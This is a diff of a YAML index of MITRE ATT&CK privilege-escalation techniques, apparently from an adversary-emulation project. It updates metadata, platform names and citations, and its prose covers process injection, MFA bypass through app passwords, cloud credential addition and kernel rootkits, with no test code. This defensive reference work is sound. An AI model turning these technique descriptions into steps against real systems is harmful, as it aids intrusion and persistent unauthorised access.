+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -23401,8 +23711,6 @@ privilege-escalation:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.005:
     technique:
@@ -23432,7 +23740,7 @@ privilege-escalation:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -23467,12 +23775,10 @@ privilege-escalation:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -23549,7 +23855,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1055.004:
@@ -23588,7 +23893,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -23637,8 +23942,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1546.009:
@@ -23670,7 +23973,7 @@ privilege-escalation:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -23718,13 +24021,11 @@ privilege-escalation:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -23737,16 +24038,16 @@ privilege-escalation:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -23758,16 +24059,16 @@ privilege-escalation:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -23822,7 +24123,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.002:
     technique:
@@ -23845,7 +24145,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -23889,8 +24189,6 @@ privilege-escalation:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1547.015:
@@ -23967,7 +24265,7 @@ privilege-escalation:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -23995,8 +24293,6 @@ privilege-escalation:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1134.001:
@@ -24055,23 +24351,22 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -24081,11 +24376,15 @@ privilege-escalation:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -24096,12 +24395,19 @@ privilege-escalation:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -24110,6 +24416,7 @@ privilege-escalation:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -24118,13 +24425,16 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -24150,10 +24460,18 @@ privilege-escalation:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -24162,10 +24480,20 @@ privilege-escalation:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -24182,9 +24510,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1134.003:
@@ -24248,7 +24573,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -24337,7 +24661,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1134.004:
@@ -24395,7 +24718,7 @@ privilege-escalation:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -24420,12 +24743,11 @@ privilege-escalation:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -24451,7 +24773,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -24465,7 +24786,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -24492,8 +24812,8 @@ privilege-escalation:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -24504,7 +24824,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1055.014:
@@ -24575,7 +24896,7 @@ privilege-escalation:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -24602,7 +24923,6 @@ privilege-escalation:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.014:
     technique:
@@ -24642,7 +24962,7 @@ privilege-escalation:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -24662,12 +24982,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -24721,11 +25040,10 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -24812,9 +25130,9 @@ privilege-escalation:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -24827,12 +25145,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -24868,16 +25185,15 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -24918,143 +25234,141 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests: []
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
